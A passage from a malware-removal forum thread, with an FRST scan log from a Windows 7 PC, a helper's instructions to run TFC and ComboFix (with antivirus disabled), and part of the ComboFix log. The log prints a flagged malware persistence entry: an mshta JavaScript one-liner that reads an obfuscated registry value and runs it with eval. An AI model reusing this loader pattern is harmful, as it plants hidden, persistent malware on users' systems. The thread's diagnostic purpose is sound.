Shortcut: C:\Users\james\AppData\Local\ecf2194c\3c77be0a.lnk -> C:\Users\james\AppData\Local\ecf2194c\b53a3831.bat ()

==================== Loaded Modules (Whitelisted) ==============

2016-07-22 15:11 - 2016-05-24 12:43 - 08909504 _____ () C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\1033\GrooveIntlResource.dll
2014-03-19 20:20 - 2016-05-24 09:51 - 00116416 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll
2012-04-12 01:04 - 2009-02-27 22:13 - 00053248 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Keyboard\ModLEDKey.exe
2012-01-27 11:11 - 2012-01-27 11:11 - 00369152 _____ () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
2011-11-02 17:03 - 2011-11-02 17:03 - 00098304 _____ () c:\Program Files (x86)\ATI Technologies\ATI.ACE\Branding\Branding.dll
2012-04-12 01:04 - 2009-02-19 20:22 - 00028672 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Keyboard\WMINPUT.DLL

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

HKU\S-1-5-21-531013560-757715300-2485835200-1000\Software\Classes\e3f69a90: "C:\Windows\system32\mshta.exe" "javascript:oiOb1J="6M";bS95=new ActiveXObject("WScript.Shell");Tob6D7kv="I";uV1gR=bS95.RegRead("HKCU\\software\\lvmv\\bkxvzwbkbk");y85nIyo="cftk3ru";eval(uV1gR);mi7b4btT="uOs";" <===== ATTENTION

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 22:34 - 2015-07-02 13:00 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts

127.0.0.1       localhost

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-531013560-757715300-2485835200-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\james\AppData\Roaming\Mozilla\Firefox\Desktop Background.bmp
DNS Servers: [removed] - [removed]
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

MSCONFIG\startupreg: HP Officejet 4620 series (NET) => "C:\Program Files\hp\HP Officejet 4620 series\Bin\ScanToPCActivationApp.exe" -deviceID "CN24D131GD05S1:NW" -scfn "HP Officejet 4620 series (NET)" -AutoStart 1
MSCONFIG\startupreg: HP Software Update => c:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe
MSCONFIG\startupreg: hpsysdrv => c:\program files (x86)\hewlett-packard\HP odometer\hpsysdrv.exe
MSCONFIG\startupreg: Magic Canvas => "C:\Program Files (x86)\Hewlett-Packard\TouchSmart\SmartCenter\SmartCenter.exe"
MSCONFIG\startupreg: NCPluginUpdater => "C:\Program Files (x86)\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\NCPluginUpdater.exe" Update
MSCONFIG\startupreg: PDF Complete => C:\Program Files (x86)\PDF Complete\pdfsty.exe

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{ED583B53-1517-45DE-B2DB-58319D750E64}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{C6C97EAB-6BA9-4865-9AA7-5FB98AB82B53}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\Remote Graphics Receiver\rgreceiver.exe
FirewallRules: [{EAFF86DF-AB98-47EC-AACD-400A09433A88}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\Remote Graphics Receiver\rgreceiver.exe
FirewallRules: [{7C696241-CEF0-4F9E-8F8B-4BB9CD7E1F20}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP LinkUp\HP LinkUp Viewer.exe
FirewallRules: [{B5089284-FF6F-42A7-947D-C99634AACE0A}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP LinkUp\HP LinkUp Viewer.exe
FirewallRules: [{A3502F13-E030-46B8-B261-536D7498F7A3}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{796A7A0B-6A56-439B-A645-6E018D079A5A}] => (Allow) LPort=2869
FirewallRules: [{D1D8810B-6D7A-4495-A4B8-09D223F767F8}] => (Allow) LPort=1900
FirewallRules: [{BFDD6086-C239-42A9-8020-269CF5466147}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{76438ADC-EE49-4503-8249-7EA06C147377}] => (Allow) C:\Program Files (x86)\Windows Live\Mesh\MOE.exe
FirewallRules: [{281C0700-D1C2-4946-BBBB-FBE56A290FBF}] => (Allow) C:\Program Files\HP\HP Officejet 4620 series\bin\FaxApplications.exe
FirewallRules: [{C6539288-9F9C-4962-80B4-5634C1B1E30F}] => (Allow) C:\Program Files\HP\HP Officejet 4620 series\bin\DigitalWizards.exe
FirewallRules: [{3581F2AE-CFBE-4952-860B-DCD282CFDCA8}] => (Allow) C:\Program Files\HP\HP Officejet 4620 series\bin\SendAFax.exe
FirewallRules: [{0C596D8B-BFC3-4364-8C5E-84434C7152F6}] => (Allow) C:\Program Files\HP\HP Officejet 4620 series\Bin\DeviceSetup.exe
FirewallRules: [{B146E146-535B-456F-BB03-7D88187C53EB}] => (Allow) C:\Program Files\HP\HP Officejet 4620 series\Bin\HPNetworkCommunicator.exe
FirewallRules: [{65F89F0B-FB7B-4871-97CD-3C9A5AE4A49A}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPPSdr\HPDiagnosticCoreUI.exe
FirewallRules: [{84870BBA-CCC3-41A5-8D42-D214D408A9CB}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPPSdr\HPDiagnosticCoreUI.exe
FirewallRules: [{1DF957FC-D2D3-46C7-BF0A-5EB8EE812B8B}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe
FirewallRules: [{EEE96708-82CD-4A92-B144-FF6CA2A660BF}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPDeviceDetection3.exe
FirewallRules: [{D780AAC5-0E23-4F98-8A1E-BDC87A93106C}] => (Allow) C:\Users\james\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe
FirewallRules: [{4050BC5E-BAF1-47C4-BC87-A0C0489C4690}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{ED0D736A-31B9-46A4-A563-7F4B48CC743E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe

==================== Restore Points =========================

27-08-2016 20:02:57 Windows Update
31-08-2016 04:49:01 Windows Update
04-09-2016 07:34:43 Windows Update
07-09-2016 21:55:20 Windows Update
08-09-2016 23:12:15 JRT Pre-Junkware Removal
11-09-2016 19:59:05 Windows Update
16-09-2016 19:17:48 JRT Pre-Junkware Removal
22-09-2016 16:39:01 Windows Update
26-09-2016 00:51:33 JRT Pre-Junkware Removal
26-09-2016 12:17:47 AA11
26-09-2016 12:31:44 AA11
26-09-2016 12:59:06 JRT Pre-Junkware Removal

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (09/15/2016 07:43:00 PM) (Source: SideBySide) (EventID: 80) (User: )
Description: Activation context generation failed for "C:\Users\james\Downloads\esetsmartinstaller_enu(1).exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d.manifest.

Error: (09/15/2016 07:43:00 PM) (Source: SideBySide) (EventID: 80) (User: )
Description: Activation context generation failed for "C:\Users\james\Downloads\esetsmartinstaller_enu.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d.manifest.

Error: (09/15/2016 06:32:20 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: CALMAIN.exe, version: 8.1.0.14, time stamp: 0x433d11f9
Faulting module name: msvcrt.dll, version: 7.0.7601.17744, time stamp: 0x4eeaf722
Exception code: 0xc0000005
Fault offset: 0x00009966
Faulting process id: 0xbe4
Faulting application start time: 0x01d20f8b9fd21330
Faulting application path: C:\Program Files (x86)\Canon\CAL\CALMAIN.exe
Faulting module path: C:\Windows\syswow64\msvcrt.dll
Report Id: 431b3b4a-7b94-11e6-9204-047d7bd68a6c

Error: (09/14/2016 07:03:57 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: CALMAIN.exe, version: 8.1.0.14, time stamp: 0x433d11f9
Faulting module name: msvcrt.dll, version: 7.0.7601.17744, time stamp: 0x4eeaf722
Exception code: 0xc0000005
Fault offset: 0x00009966
Faulting process id: 0x574
Faulting application start time: 0x01d20ed6df1649a2
Faulting application path: C:\Program Files (x86)\Canon\CAL\CALMAIN.exe
Faulting module path: C:\Windows\syswow64\msvcrt.dll
Report Id: 83c03d50-7acf-11e6-a0af-047d7bd68a6c

Error: (09/12/2016 07:14:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: CALMAIN.exe, version: 8.1.0.14, time stamp: 0x433d11f9
Faulting module name: msvcrt.dll, version: 7.0.7601.17744, time stamp: 0x4eeaf722
Exception code: 0xc0000005
Fault offset: 0x00009966
Faulting process id: 0x438
Faulting application start time: 0x01d20d2cf1966348
Faulting application path: C:\Program Files (x86)\Canon\CAL\CALMAIN.exe
Faulting module path: C:\Windows\syswow64\msvcrt.dll
Report Id: 9f42cd6c-793e-11e6-8332-047d7bd68a6c

Error: (09/11/2016 05:56:03 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: CALMAIN.exe, version: 8.1.0.14, time stamp: 0x433d11f9
Faulting module name: msvcrt.dll, version: 7.0.7601.17744, time stamp: 0x4eeaf722
Exception code: 0xc0000005
Fault offset: 0x00009966
Faulting process id: 0xb4c
Faulting application start time: 0x01d20c35a338a1c8
Faulting application path: C:\Program Files (x86)\Canon\CAL\CALMAIN.exe
Faulting module path: C:\Windows\syswow64\msvcrt.dll
Report Id: 87daba12-786a-11e6-9184-047d7bd68a6c

Error: (09/10/2016 08:13:37 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: CALMAIN.exe, version: 8.1.0.14, time stamp: 0x433d11f9
Faulting module name: msvcrt.dll, version: 7.0.7601.17744, time stamp: 0x4eeaf722
Exception code: 0xc0000005
Fault offset: 0x00009966
Faulting process id: 0x9b4
Faulting application start time: 0x01d20bb3634f46a7
Faulting application path: C:\Program Files (x86)\Canon\CAL\CALMAIN.exe
Faulting module path: C:\Windows\syswow64\msvcrt.dll
Report Id: 956444de-77b4-11e6-882c-047d7bd68a6c

Error: (09/06/2016 08:42:12 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: CALMAIN.exe, version: 8.1.0.14, time stamp: 0x433d11f9
Faulting module name: msvcrt.dll, version: 7.0.7601.17744, time stamp: 0x4eeaf722
Exception code: 0xc0000005
Fault offset: 0x00009966
Faulting process id: 0x928
Faulting application start time: 0x01d2088d7a1173c2
Faulting application path: C:\Program Files (x86)\Canon\CAL\CALMAIN.exe
Faulting module path: C:\Windows\syswow64\msvcrt.dll
Report Id: ea2201e8-7493-11e6-843c-047d7bd68a6c

Error: (09/04/2016 03:01:48 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: CALMAIN.exe, version: 8.1.0.14, time stamp: 0x433d11f9
Faulting module name: msvcrt.dll, version: 7.0.7601.17744, time stamp: 0x4eeaf722
Exception code: 0xc0000005
Fault offset: 0x00009966
Faulting process id: 0xb68
Faulting application start time: 0x01d206aee0975898
Faulting application path: C:\Program Files (x86)\Canon\CAL\CALMAIN.exe
Faulting module path: C:\Windows\syswow64\msvcrt.dll
Report Id: 07baed48-72d2-11e6-9950-047d7bd68a6c

Error: (09/03/2016 12:02:25 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: CALMAIN.exe, version: 8.1.0.14, time stamp: 0x433d11f9
Faulting module name: msvcrt.dll, version: 7.0.7601.17744, time stamp: 0x4eeaf722
Exception code: 0xc0000005
Fault offset: 0x00009966
Faulting process id: 0x70c
Faulting application start time: 0x01d205d89bb0c034
Faulting application path: C:\Program Files (x86)\Canon\CAL\CALMAIN.exe
Faulting module path: C:\Windows\syswow64\msvcrt.dll
Report Id: cd84ffef-71ef-11e6-8659-047d7bd68a6c


System errors:
=============
Error: (09/29/2016 02:05:54 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.

Error: (09/29/2016 12:12:08 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Microsoft Antimalware has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 1.227.2939.0

    Update Source: Microsoft Update Server

    Update Stage: Download

    Source Path: http://www.microsoft.com

    Signature Type: AntiVirus

    Update Type: Full

    User: NT AUTHORITY\SYSTEM

    Current Engine Version:

    Previous Engine Version: 1.1.13000.0

    Error code: 0x80240022

    Error description: The program can't check for definition updates.

Error: (09/29/2016 12:12:08 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Microsoft Antimalware has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 1.227.2939.0

    Update Source: Microsoft Update Server

    Update Stage: Download

    Source Path: http://www.microsoft.com

    Signature Type: AntiVirus

    Update Type: Full

    User: NT AUTHORITY\SYSTEM

    Current Engine Version:

    Previous Engine Version: 1.1.13000.0

    Error code: 0x80240022

    Error description: The program can't check for definition updates.

Error: (09/28/2016 11:47:47 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Microsoft Antimalware has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 1.227.2939.0

    Update Source: Microsoft Update Server

    Update Stage: Search

    Source Path: http://www.microsoft.com

    Signature Type: AntiVirus

    Update Type: Full

    User: NT AUTHORITY\SYSTEM

    Current Engine Version:

    Previous Engine Version: 1.1.13000.0

    Error code: 0x8024001e

    Error description: An unexpected problem occurred while checking for updates. For information on installing or troubleshooting updates, see Help and Support.

Error: (09/28/2016 07:25:51 AM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Microsoft Antimalware has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 1.227.2939.0

    Update Source: Microsoft Update Server

    Update Stage: Search

    Source Path: http://www.microsoft.com

    Signature Type: AntiVirus

    Update Type: Full

    User: NT AUTHORITY\SYSTEM

    Current Engine Version:

    Previous Engine Version: 1.1.13000.0

    Error code: 0x8024001e

    Error description: An unexpected problem occurred while checking for updates. For information on installing or troubleshooting updates, see Help and Support.

Error: (09/27/2016 08:20:46 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Microsoft Antimalware has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 1.227.2939.0

    Update Source: Microsoft Update Server

    Update Stage: Search

    Source Path: http://www.microsoft.com

    Signature Type: AntiVirus

    Update Type: Full

    User: NT AUTHORITY\SYSTEM

    Current Engine Version:

    Previous Engine Version: 1.1.13000.0

    Error code: 0x8024001e

    Error description: An unexpected problem occurred while checking for updates. For information on installing or troubleshooting updates, see Help and Support.

Error: (09/26/2016 01:15:32 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Microsoft Antimalware has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 1.227.2939.0

    Update Source: Microsoft Update Server

    Update Stage: Search

    Source Path: http://www.microsoft.com

    Signature Type: AntiVirus

    Update Type: Full

    User: NT AUTHORITY\SYSTEM

    Current Engine Version:

    Previous Engine Version: 1.1.13000.0

    Error code: 0x8024001e

    Error description: An unexpected problem occurred while checking for updates. For information on installing or troubleshooting updates, see Help and Support.

Error: (09/26/2016 12:55:41 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Windows Media Player Network Sharing Service service failed to start due to the following error:
The service did not start due to a logon failure.

Error: (09/26/2016 12:55:41 PM) (Source: Service Control Manager) (EventID: 7038) (User: )
Description: The WMPNetworkSvc service was unable to log on as NT AUTHORITY\NetworkService with the currently configured password due to the following error:
The request is not supported.


To ensure that the service is configured properly, use the Services snap-in in Microsoft Management Console (MMC).

Error: (09/26/2016 12:55:40 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Windows Search service failed to start due to the following error:
The service did not start due to a logon failure.


CodeIntegrity:
===================================
  Date: 2015-07-02 12:58:30.512
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2015-07-02 12:58:30.434
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2015-07-02 12:58:30.356
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2015-07-02 12:58:30.278
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2015-07-02 12:50:55.007
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2015-07-02 12:50:54.929
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2015-07-02 12:50:54.851
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2015-07-02 12:50:54.788
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2015-06-26 20:29:44.944
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2015-06-26 20:29:44.864
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.


==================== Memory info ===========================

Processor: AMD E2-1800 APU with Radeon™ HD Graphics
Percentage of memory in use: 50%
Total physical RAM: 3700.66 MB
Available physical RAM: 1818.61 MB
Total Virtual: 7399.51 MB
Available Virtual: 4884.07 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:448.46 GB) (Free:393.62 GB) NTFS
Drive d: (HP_RECOVERY) (Fixed) (Total:17.2 GB) (Free:2.12 GB) NTFS ==>[system with boot components (obtained from drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 2C929540)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=448.5 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=17.2 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================

Hello nscalenut and welcome to the WTT forum.

My name is Satchfan and I would be glad to help you with your computer problem.

Please read the following guidelines which will help to make cleaning your machine easier:

  • please follow all instructions in the order posted
  • please continue to review my answers until I tell you your machine appears to be clear. Absence of symptoms does not mean that everything is clear
  • all logs/reports, etc. must be posted in Notepad. Please ensure that word wrap is unchecked. In Notepad click Format, uncheck Word wrap if it is checked
  • if you don't understand something, please don't hesitate to ask for clarification before proceeding
  • the fixes are specific to your problem and should only be used for this issue on this machine.
  • please reply within 3 days. If you do not reply within this period I will post a reminder but topics with no reply in 4 days will be closed!

IMPORTANT:

Please DO NOT install/uninstall any programs unless asked to.
Please DO NOT run any scans other than those requested

====================================================

There are a few strange entries that I’m not sure about so let’s run a couple of different scans,

Download TFC to your desktop

  • close any open windows
  • double click the TFC icon to run the program
  • TFC will close all open programs itself in order to run
  • click the Start button to begin the process
  • allow TFC to run uninterrupted
  • the program should not take long to finish it's job
  • once its finished it should automatically reboot your machine
  • if it doesn't, manually reboot to ensure a complete clean.

====================================================

Download and run ComboFix

Link 1
Link 2

**Note:  It is important that it is saved directly to your desktop**

——————————————————————–
IMPORTANT - Disable your AntiVirus and AntiSpyware applications, usually via a right click on the System Tray icon. They may otherwise interfere with our tools. If you have difficulty properly disabling your protective programs, refer to this link here
——————————————————————–
 

  • double click on ComboFix.exe & follow the prompts.
  • when finished, it will produce a report: please post the C:\ComboFix.txt log in your reply.

Satchfan

 

ComboFix 16-09-28.01 - james 09/30/2016  18:10:48.1.2 - x64
Microsoft Windows 7 Home Premium   6.1.7601.1.1252.1.1033.18.3701.1887 [GMT -4:00]
Running from: c:\users\[removed]\Desktop\ComboFix.exe
AV: Microsoft Security Essentials *Disabled/Updated* {768124D7-F5F7-6D2F-DDC2-94DFA4017C95}
SP: Microsoft Security Essentials *Disabled/Updated* {CDE0C533-D3CD-62A1-E772-AFADDF863628}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
(((((((((((((((((((((((((   Files Created from 2016-08-28 to 2016-09-30  )))))))))))))))))))))))))))))))
.
.
2016-09-30 22:20 . 2016-09-30 22:20    ——–    d—–w-    c:\users\Public\AppData\Local\temp
2016-09-30 22:20 . 2016-09-30 22:20    ——–    d—–w-    c:\users\Default\AppData\Local\temp
2016-09-30 16:59 . 2016-09-30 17:04    ——–    d—–w-    C:\FRST
2016-09-29 16:55 . 2016-09-29 16:55    ——–    d—–w-    c:\users\james\AppData\Roaming\c252533c
2016-09-29 16:55 . 2016-09-29 16:55    ——–    d—–w-    c:\users\james\AppData\Local\ecf2194c
2016-09-29 16:14 . 2016-07-06 22:19    1167568    —-a-w-    c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{B9B577D7-366B-4311-8B1F-8B6B7A465DF3}\gapaengine.dll
2016-09-29 16:13 . 2016-09-22 15:57    12030488    —-a-w-    c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{AEF3A46E-848C-47D9-A76E-7DE73CAB3489}\mpengine.dll
2016-09-26 04:25 . 2016-08-02 22:36    11847048    —-a-w-    c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2016-09-30 14:27 . 2015-07-02 22:58    192216    —-a-w-    c:\windows\system32\drivers\MBAMSwissArmy.sys
2016-08-11 03:29 . 2013-01-04 21:51    147640136    -c–a-w-    c:\windows\system32\MRT.exe
2016-08-02 14:54 . 2016-08-11 03:25    394440    —-a-w-    c:\windows\system32\iedkcs32.dll
2016-08-02 06:54 . 2016-08-11 03:25    25808384    —-a-w-    c:\windows\system32\mshtml.dll
2016-08-02 06:47 . 2016-08-11 03:26    2724864    —-a-w-    c:\windows\system32\mshtml.tlb
2016-08-02 06:47 . 2016-08-11 03:25    4096    —-a-w-    c:\windows\system32\ieetwcollectorres.dll
2016-08-02 06:32 . 2016-08-11 03:25    66560    —-a-w-    c:\windows\system32\iesetup.dll
2016-08-02 06:32 . 2016-08-11 03:25    2894336    —-a-w-    c:\windows\system32\iertutil.dll
2016-08-02 06:31 . 2016-08-11 03:26    48640    —-a-w-    c:\windows\system32\ieetwproxystub.dll
2016-08-02 06:31 . 2016-08-11 03:25    417792    —-a-w-    c:\windows\system32\html.iec
2016-08-02 06:31 . 2016-08-11 03:25    572416    —-a-w-    c:\windows\system32\vbscript.dll
2016-08-02 06:31 . 2016-08-11 03:25    88064    —-a-w-    c:\windows\system32\MshtmlDac.dll
2016-08-02 06:24 . 2016-08-11 03:25    54784    —-a-w-    c:\windows\system32\jsproxy.dll
2016-08-02 06:23 . 2016-08-11 03:26    34304    —-a-w-    c:\windows\system32\iernonce.dll
2016-08-02 06:20 . 2016-08-11 03:25    615936    —-a-w-    c:\windows\system32\ieui.dll
2016-08-02 06:19 . 2016-08-11 03:26    114688    —-a-w-    c:\windows\system32\ieetwcollector.exe
2016-08-02 06:19 . 2016-08-11 03:25    144384    —-a-w-    c:\windows\system32\ieUnatt.exe
2016-08-02 06:18 . 2016-08-11 03:25    814080    —-a-w-    c:\windows\system32\jscript9diag.dll
2016-08-02 06:18 . 2016-08-11 03:25    817664    —-a-w-    c:\windows\system32\jscript.dll
2016-08-02 06:18 . 2016-08-11 03:25    6047744    —-a-w-    c:\windows\system32\jscript9.dll
2016-08-02 06:11 . 2016-08-11 03:25    969216    —-a-w-    c:\windows\system32\MsSpellCheckingFacility.exe
2016-08-02 06:08 . 2016-08-11 03:25    489984    —-a-w-    c:\windows\system32\dxtmsft.dll
2016-08-02 06:03 . 2016-08-11 03:26    2724864    —-a-w-    c:\windows\SysWow64\mshtml.tlb
2016-08-02 06:00 . 2016-08-11 03:26    77824    —-a-w-    c:\windows\system32\JavaScriptCollectionAgent.dll
2016-08-02 05:59 . 2016-08-11 03:26    107520    —-a-w-    c:\windows\system32\inseng.dll
2016-08-02 05:56 . 2016-08-11 03:25    199680    —-a-w-    c:\windows\system32\msrating.dll
2016-08-02 05:55 . 2016-08-11 03:25    92160    —-a-w-    c:\windows\system32\mshtmled.dll
2016-08-02 05:53 . 2016-08-11 03:25    315392    —-a-w-    c:\windows\system32\dxtrans.dll
2016-08-02 05:51 . 2016-08-11 03:26    497664    —-a-w-    c:\windows\SysWow64\vbscript.dll
2016-08-02 05:51 . 2016-08-11 03:26    62464    —-a-w-    c:\windows\SysWow64\iesetup.dll
2016-08-02 05:51 . 2016-08-11 03:26    152064    —-a-w-    c:\windows\system32\occache.dll
2016-08-02 05:51 . 2016-08-11 03:26    47616    —-a-w-    c:\windows\SysWow64\ieetwproxystub.dll
2016-08-02 05:51 . 2016-08-11 03:25    341504    —-a-w-    c:\windows\SysWow64\html.iec
2016-08-02 05:50 . 2016-08-11 03:26    64000    —-a-w-    c:\windows\SysWow64\MshtmlDac.dll
2016-08-02 05:41 . 2016-08-11 03:25    115712    —-a-w-    c:\windows\SysWow64\ieUnatt.exe
2016-08-02 05:41 . 2016-08-11 03:25    620032    —-a-w-    c:\windows\SysWow64\jscript9diag.dll
2016-08-02 05:40 . 2016-08-11 03:25    262144    —-a-w-    c:\windows\system32\webcheck.dll
2016-08-02 05:38 . 2016-08-11 03:26    724992    —-a-w-    c:\windows\system32\ie4uinit.exe
2016-08-02 05:38 . 2016-08-11 03:25    806400    —-a-w-    c:\windows\system32\msfeeds.dll
2016-08-02 05:37 . 2016-08-11 03:25    1359360    —-a-w-    c:\windows\system32\mshtmlmedia.dll
2016-08-02 05:36 . 2016-08-11 03:25    2131456    —-a-w-    c:\windows\system32\inetcpl.cpl
2016-08-02 05:29 . 2016-08-11 03:26    60416    —-a-w-    c:\windows\SysWow64\JavaScriptCollectionAgent.dll
2016-08-02 05:28 . 2016-08-11 03:25    15412224    —-a-w-    c:\windows\system32\ieframe.dll
2016-08-02 05:23 . 2016-08-11 03:25    2868224    —-a-w-    c:\windows\system32\wininet.dll
2016-08-02 05:21 . 2016-08-11 03:25    4608000    —-a-w-    c:\windows\SysWow64\jscript9.dll
2016-08-02 05:14 . 2016-08-11 03:25    2055680    —-a-w-    c:\windows\SysWow64\inetcpl.cpl
2016-08-02 05:14 . 2016-08-11 03:25    1155072    —-a-w-    c:\windows\SysWow64\mshtmlmedia.dll
2016-08-02 05:10 . 2016-08-11 03:25    1550848    —-a-w-    c:\windows\system32\urlmon.dll
2016-08-02 04:59 . 2016-08-11 03:25    800768    —-a-w-    c:\windows\system32\ieapfltr.dll
2016-08-02 04:56 . 2016-08-11 03:25    2393088    —-a-w-    c:\windows\SysWow64\wininet.dll
2016-07-27 19:25 . 2010-11-21 03:27    504488    ——w-    c:\windows\system32\MpSigStub.exe
